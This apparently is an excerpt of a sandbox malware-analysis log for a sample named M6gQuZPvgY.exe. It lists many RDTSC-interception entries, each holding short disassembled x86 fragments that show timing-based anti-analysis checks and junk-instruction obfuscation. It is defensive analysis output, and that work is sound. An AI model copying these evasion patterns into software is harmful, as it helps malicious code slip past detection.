                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 414589 second address: 4145A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FE310CDC398h 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jng 00007FE310CDC3A2h 0x00000016 jnl 00007FE310CDC396h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4146EA second address: 4146F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4146F0 second address: 414717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FE310CDC39Fh 0x0000000b jg 00007FE310CDC396h 0x00000011 popad 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007FE310CDC398h 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 414717 second address: 41471C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 414B12 second address: 414B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC3A5h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 414B30 second address: 414B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 414B36 second address: 414B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 414E0B second address: 414E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE311181216h 0x0000000a je 00007FE31118121Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 414E1D second address: 414E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 40BC17 second address: 40BC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 40BC21 second address: 40BC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FE310CDC3AEh 0x0000000b jmp 00007FE310CDC3A2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 40BC40 second address: 40BC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4150C9 second address: 4150CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4150CF second address: 4150EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE311181224h 0x0000000b popad 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4159F6 second address: 4159FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4159FC second address: 415A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 415B20 second address: 415B57 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE310CDC396h 0x00000008 jnc 00007FE310CDC396h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jnl 00007FE310CDC396h 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e jmp 00007FE310CDC3A9h 0x00000023 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 415E36 second address: 415E3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 415E3C second address: 415E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007FE310CDC396h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE310CDC3A6h 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4176F6 second address: 417702 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE311181216h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 417702 second address: 41770A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 41770A second address: 41770E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 41770E second address: 417712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E204A second address: 3E2068 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FE31118121Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FE31118121Bh 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E2068 second address: 3E2084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE310CDC3A6h 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 419CFC second address: 419D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 419D00 second address: 419D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 419D04 second address: 419D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FE311181218h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 419D16 second address: 419D76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE310CDC39Fh 0x00000008 jmp 00007FE310CDC3A3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jns 00007FE310CDC3AFh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007FE310CDC39Ah 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 419D76 second address: 419D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE311181216h 0x0000000a popad 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 41B04A second address: 41B05E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE310CDC396h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jne 00007FE310CDC396h 0x00000013 pop edi 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E7046 second address: 3E704A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E704A second address: 3E7050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E8B3D second address: 3E8B59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181228h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4211BF second address: 4211C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42134C second address: 421352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 421352 second address: 421388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC39Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE310CDC3A2h 0x00000010 jmp 00007FE310CDC39Fh 0x00000015 popad 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 421388 second address: 4213A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181227h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4213A4 second address: 4213AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42154C second address: 421552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42186F second address: 421873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 421873 second address: 421879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4251B0 second address: 4251B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4251B5 second address: 4251E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FE311181222h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007FE311181220h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 425E91 second address: 425E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 425F68 second address: 425F6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 427BE7 second address: 427BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4299D0 second address: 4299D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42AD46 second address: 42AD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42AD4F second address: 42AD53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42AD53 second address: 42AD79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 and edi, dword ptr [ebp+122D2AC7h] 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D30BCh], ebx 0x00000016 push 00000000h 0x00000018 mov si, D02Eh 0x0000001c xchg eax, ebx 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jp 00007FE310CDC396h 0x00000026 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42AD79 second address: 42ADAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FE311181223h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42B867 second address: 42B86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42B86B second address: 42B875 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE311181216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3EBFAB second address: 3EBFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3EBFAF second address: 3EBFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42E9DE second address: 42E9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42E9E3 second address: 42E9E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42B5FE second address: 42B604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42F8B6 second address: 42F92D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE31118121Ch 0x00000008 jbe 00007FE311181216h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov ebx, dword ptr [ebp+12451AB0h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FE311181218h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov ebx, 6AF40462h 0x0000003a mov edi, dword ptr [ebp+12458628h] 0x00000040 push 00000000h 0x00000042 mov dword ptr [ebp+124535A5h], ecx 0x00000048 jmp 00007FE31118121Ch 0x0000004d xchg eax, esi 0x0000004e push edi 0x0000004f push ebx 0x00000050 je 00007FE311181216h 0x00000056 pop ebx 0x00000057 pop edi 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FE311181223h 0x00000060 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 431ACA second address: 431B03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FE310CDC398h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FE310CDC39Ch 0x00000019 jbe 00007FE310CDC3A9h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42EB39 second address: 42EBD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, 084BA39Bh 0x0000000f jo 00007FE31118121Ch 0x00000015 or ebx, dword ptr [ebp+12478C00h] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007FE311181218h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D1C27h], edx 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 push 00000000h 0x0000004b push edi 0x0000004c call 00007FE311181218h 0x00000051 pop edi 0x00000052 mov dword ptr [esp+04h], edi 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc edi 0x0000005f push edi 0x00000060 ret 0x00000061 pop edi 0x00000062 ret 0x00000063 mov ebx, eax 0x00000065 mov eax, dword ptr [ebp+122D0741h] 0x0000006b mov bh, 73h 0x0000006d push FFFFFFFFh 0x0000006f mov edi, 7B82CC54h 0x00000074 mov ebx, ecx 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FE31118121Fh 0x00000080 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 431B03 second address: 431B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC39Dh 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42EBD0 second address: 42EBDA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE311181216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 431B14 second address: 431B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE310CDC3A6h 0x00000008 ja 00007FE310CDC396h 0x0000000e jc 00007FE310CDC396h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FE310CDC39Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42EBDA second address: 42EBE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42FA7E second address: 42FAEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 and bx, 860Bh 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr [ebp+124551CAh], ebx 0x00000019 mov edi, dword ptr [ebp+122D3AF5h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push edi 0x00000027 jmp 00007FE310CDC3A6h 0x0000002c pop edi 0x0000002d mov eax, dword ptr [ebp+122D0081h] 0x00000033 mov ebx, dword ptr [ebp+122D5A96h] 0x00000039 mov dword ptr [ebp+122D29C8h], ebx 0x0000003f push FFFFFFFFh 0x00000041 nop 0x00000042 push ebx 0x00000043 push edx 0x00000044 jmp 00007FE310CDC3A2h 0x00000049 pop edx 0x0000004a pop ebx 0x0000004b push eax 0x0000004c pushad 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42EBE0 second address: 42EBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42FAEC second address: 42FB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC3A6h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE310CDC39Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4322E7 second address: 4322EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 433109 second address: 43314C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FE310CDC39Ch 0x0000000c nop 0x0000000d xor dword ptr [ebp+122D3848h], edx 0x00000013 jbe 00007FE310CDC396h 0x00000019 push 00000000h 0x0000001b mov di, B505h 0x0000001f push 00000000h 0x00000021 mov dword ptr [ebp+122D2DE5h], eax 0x00000027 xchg eax, esi 0x00000028 jmp 00007FE310CDC39Ah 0x0000002d push eax 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jnp 00007FE310CDC396h 0x00000037 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43314C second address: 433150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 433F62 second address: 433F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 433F67 second address: 433F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 434EAD second address: 434EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 434EB3 second address: 434EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4340DD second address: 434179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007FE310CDC3A2h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FE310CDC398h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 xor di, 7291h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c sub dword ptr [ebp+122D21E9h], esi 0x00000042 pushad 0x00000043 stc 0x00000044 jo 00007FE310CDC399h 0x0000004a movzx edi, bx 0x0000004d popad 0x0000004e mov eax, dword ptr [ebp+122D0A01h] 0x00000054 push 00000000h 0x00000056 push ebx 0x00000057 call 00007FE310CDC398h 0x0000005c pop ebx 0x0000005d mov dword ptr [esp+04h], ebx 0x00000061 add dword ptr [esp+04h], 0000001Bh 0x00000069 inc ebx 0x0000006a push ebx 0x0000006b ret 0x0000006c pop ebx 0x0000006d ret 0x0000006e push FFFFFFFFh 0x00000070 push eax 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FE310CDC39Bh 0x00000079 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 435ECD second address: 435EDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F47 second address: 436F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F4B second address: 436F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F51 second address: 436F5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FE310CDC396h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
